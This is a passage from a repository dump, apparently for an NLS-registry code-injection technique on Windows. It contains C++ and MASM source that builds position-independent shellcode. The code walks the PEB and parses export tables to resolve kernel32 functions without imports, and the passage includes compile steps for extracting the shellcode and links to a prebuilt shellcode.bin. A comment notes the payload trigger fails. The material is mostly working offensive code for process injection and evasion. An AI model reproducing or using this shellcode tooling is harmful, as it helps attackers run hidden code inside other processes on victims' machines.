$LN14@GetModuleB: 770 | ; Line 62 771 | jmp $LN2@GetModuleB 772 | $LN3@GetModuleB: 773 | ; Line 64 774 | xor eax, eax 775 | $LN1@GetModuleB: 776 | ; Line 65 777 | add rsp, 88 ; 00000058H 778 | ret 0 779 | ?GetModuleByName@@YAPEAXPEA_W@Z ENDP ; GetModuleByName 780 | _TEXT ENDS 781 | END 782 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.cpp: -------------------------------------------------------------------------------- 1 | // ShellcodeInjection.cpp : Este archivo contiene la función "main". La ejecución del programa comienza y termina ahí. 2 | // 3 | #include "defs.h" 4 | 5 | UINT initializeIatShellcode(kernel32Iat& iat) 6 | { 7 | wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 }; 8 | LPVOID baseAddrKernel32 = GetModuleByName(kernel32_dll_name); 9 | if (!baseAddrKernel32) { 10 | return 1; 11 | } 12 | char get_proc_name[] = { 'G','e','t','P','r','o','c','A','d','d','r','e','s','s',0 }; 13 | LPVOID get_proc = GetFunctionByName((HMODULE)baseAddrKernel32, (LPSTR)get_proc_name); 14 | if (!get_proc) { 15 | return 3; 16 | } 17 | iat._GetProcAddress = (FARPROC(WINAPI*)(HMODULE, LPCSTR)) get_proc; 18 | 19 | char get_console_window_name[] = { 'G','e','t','C','o','n','s','o','l','e','W','i','n','d','o','w',0 }; 20 | char alloc_console_name[] = { 'A','l','l','o','c','C','o','n','s','o','l','e',0 }; 21 | char set_console_cp_name[] = { 'S','e','t','C','o','n','s','o','l','e','C','P',0 }; 22 | char set_console_output_cp_name[] = { 'S','e','t','C','o','n','s','o','l','e','O','u','t','p','u','t','C','P',0 }; 23 | char set_Thread_UI_language_Name[] = { 'S','e','t','T', 'h', 'r','e','a','d', 'U','I', 'L', 'a','n','g','u','a','g','e', 0 }; 24 | 25 | iat._SetConsoleOutputCP = (BOOL(WINAPI * )(UINT))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_console_output_cp_name); 26 | if (!iat._SetConsoleOutputCP) { 27 | return 4; 28 | } 29 | iat._GetConsoleWindow = (HWND(WINAPI * )()) iat._GetProcAddress((HMODULE)baseAddrKernel32, get_console_window_name); 30 | if (!iat._GetConsoleWindow) { 31 | return 5; 32 | } 33 | iat._SetConsoleCP = (BOOL(WINAPI * )(UINT))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_console_cp_name); 34 | if (!iat._SetConsoleCP) { 35 | return 6; 36 | } 37 | iat._AllocConsole = (BOOL(WINAPI* )()) iat._GetProcAddress((HMODULE)baseAddrKernel32, alloc_console_name); 38 | if (!iat._AllocConsole) { 39 | return 7; 40 | } 41 | iat._SetThreadUILanguage = (LANGID(WINAPI *)(LANGID))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_Thread_UI_language_Name); 42 | if (!iat._SetThreadUILanguage) { 43 | return 8; 44 | } 45 | return 0; 46 | } 47 | 48 | //Fix this payload trigger, it fails! 49 | void SpawnPayload(DWORD* dwCodePageId, kernel32Iat& iat) 50 | { 51 | DWORD dwCodePageID = *dwCodePageId; 52 | if (!iat._GetConsoleWindow()) 53 | { 54 | if (!iat._AllocConsole()) { 55 | return; 56 | } 57 | } 58 | //Shellcode fails here. 59 | if (!iat._SetConsoleOutputCP(dwCodePageID)){ 60 | return; 61 | } 62 | if (!iat._SetConsoleCP(dwCodePageID)){ 63 | return; 64 | } 65 | iat._SetThreadUILanguage(0); 66 | } 67 | 68 | //cl /c /FA /GS- ShellcodeInjection.cpp 69 | //Delete xdata and pdata, comment INCLUDELIB LIBCMT and INCLUDELIB OLDNAMES 70 | //ml64 /c ShellcodeInjection.asm /link /entry:AlignRSP 71 | 72 | int main(DWORD* dwCodeID) 73 | { 74 | kernel32Iat iat; 75 | if (initializeIatShellcode(iat)) { 76 | return 1; 77 | } 78 | SpawnPayload(dwCodeID, iat); 79 | 80 | return 0; 81 | } -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/ShellcodeInjection.obj -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {4225c8d1-e331-4436-ba0c-4f8051b8cbdf} 25 | ShellcodeInjection 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Archivos de origen 20 | 21 | 22 | 23 | 24 | Archivos de encabezado 25 | 26 | 27 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ShellcodeInjection/all sections/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/all sections/shellcode.bin -------------------------------------------------------------------------------- /ShellcodeInjection/defs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #define RTL_MAX_DRIVE_LETTERS 32 4 | #include 5 | //Header based on https://github.com/hasherezade/masm_shc/blob/master/demos/peb_lookup.h 6 | 7 | #ifndef TO_LOWERCASE 8 | #define TO_LOWERCASE(out, c1) (out = (c1 <= 'Z' && c1 >= 'A') ? c1 = (c1 - 'A') + 'a': c1) 9 | #endif 10 | 11 | // enhanced version of LDR_DATA_TABLE_ENTRY 12 | typedef struct _LDR_DATA_TABLE_ENTRY1 { 13 | LIST_ENTRY InLoadOrderLinks; 14 | LIST_ENTRY InMemoryOrderLinks; 15 | LIST_ENTRY InInitializationOrderLinks; 16 | void* DllBase; 17 | void* EntryPoint; 18 | ULONG SizeOfImage; 19 | UNICODE_STRING FullDllName; 20 | UNICODE_STRING BaseDllName; 21 | ULONG Flags; 22 | SHORT LoadCount; 23 | SHORT TlsIndex; 24 | HANDLE SectionHandle; 25 | ULONG CheckSum; 26 | ULONG TimeDateStamp; 27 | } LDR_DATA_TABLE_ENTRY1, * PLDR_DATA_TABLE_ENTRY1; 28 | 29 | inline LPVOID GetModuleByName(WCHAR* module_name) 30 | { 31 | PEB* peb; 32 | #if defined(_WIN64) 33 | peb = (PPEB)__readgsqword(0x60); 34 | #else 35 | peb = (PPEB)__readfsdword(0x30); 36 | #endif 37 | PEB_LDR_DATA* ldr = peb->Ldr; 38 | 39 | LIST_ENTRY* head = &ldr->InMemoryOrderModuleList; 40 | for (LIST_ENTRY* current = head->Flink; current != head; current = current->Flink) { 41 | LDR_DATA_TABLE_ENTRY1* entry = CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY1, InMemoryOrderLinks); 42 | if (!entry || !entry->DllBase) break; 43 | 44 | WCHAR* curr_name = entry->BaseDllName.Buffer; 45 | if (!curr_name) continue; 46 | 47 | size_t i; 48 | for (i = 0; i < entry->BaseDllName.Length; i++) { 49 | // if any of the strings finished: 50 | if (module_name[i] == 0 || curr_name[i] == 0) { 51 | break; 52 | } 53 | WCHAR c1, c2; 54 | TO_LOWERCASE(c1, module_name[i]); 55 | TO_LOWERCASE(c2, curr_name[i]); 56 | if (c1 != c2) break; 57 | } 58 | // both of the strings finished, and so far they were identical: 59 | if (module_name[i] == 0 && curr_name[i] == 0) { 60 | return entry->DllBase; 61 | } 62 | } 63 | 64 | return NULL; 65 | } 66 | 67 | inline LPVOID GetFunctionByName(LPVOID module, char* func_name) 68 | { 69 | IMAGE_DOS_HEADER* idh = (IMAGE_DOS_HEADER*)module; 70 | if (idh->e_magic != IMAGE_DOS_SIGNATURE) { 71 | return NULL; 72 | } 73 | IMAGE_NT_HEADERS* nt_headers = (IMAGE_NT_HEADERS*)((BYTE*)module + idh->e_lfanew); 74 | IMAGE_DATA_DIRECTORY* exportsDir = &(nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]); 75 | if (!exportsDir->VirtualAddress) { 76 | return NULL; 77 | } 78 | 79 | DWORD expAddr = exportsDir->VirtualAddress; 80 | IMAGE_EXPORT_DIRECTORY* exp = (IMAGE_EXPORT_DIRECTORY*)(expAddr + (ULONG_PTR)module); 81 | SIZE_T namesCount = exp->NumberOfNames; 82 | 83 | DWORD funcsListRVA = exp->AddressOfFunctions; 84 | DWORD funcNamesListRVA = exp->AddressOfNames; 85 | DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; 86 | 87 | //go through names: 88 | for (SIZE_T i = 0; i < namesCount; i++) { 89 | DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*)module + i * sizeof(DWORD)); 90 | WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*)module + i * sizeof(WORD)); 91 | DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*)module + (*nameIndex) * sizeof(DWORD)); 92 | 93 | LPSTR curr_name = (LPSTR)(*nameRVA + (BYTE*)module); 94 | size_t k; 95 | for (k = 0; func_name[k] != 0 && curr_name[k] != 0; k++) { 96 | if (func_name[k] != curr_name[k]) break; 97 | } 98 | if (func_name[k] == 0 && curr_name[k] == 0) { 99 | //found 100 | return (BYTE*)module + (*funcRVA); 101 | } 102 | } 103 | return NULL; 104 | } 105 | 106 | struct kernel32Iat { 107 | BOOL(WINAPI* _SetConsoleOutputCP)(UINT wCodePageID); 108 | HWND(WINAPI* _GetConsoleWindow)(); 109 | BOOL(WINAPI* _SetConsoleCP)(UINT wCodePageID); 110 | BOOL(WINAPI* _AllocConsole)(); 111 | LANGID(WINAPI* _SetThreadUILanguage)(LANGID LangId); 112 | FARPROC(WINAPI* _GetProcAddress)(HMODULE hModule, LPCSTR lpProcName); 113 | }iat_kernel32, * piat_struct32; -------------------------------------------------------------------------------- /ShellcodeInjection/mllink$.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/mllink$.lnk -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/x64/Release/ShellcodeInjection.Build.CppClean.log -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\USER\source\repos\NLSRegistryCodeInjection\x64\Release\ShellcodeInjection.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.log: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/x64/Release/ShellcodeInjection.vcxproj.FileListAbsolute.txt --------------------------------------------------------------------------------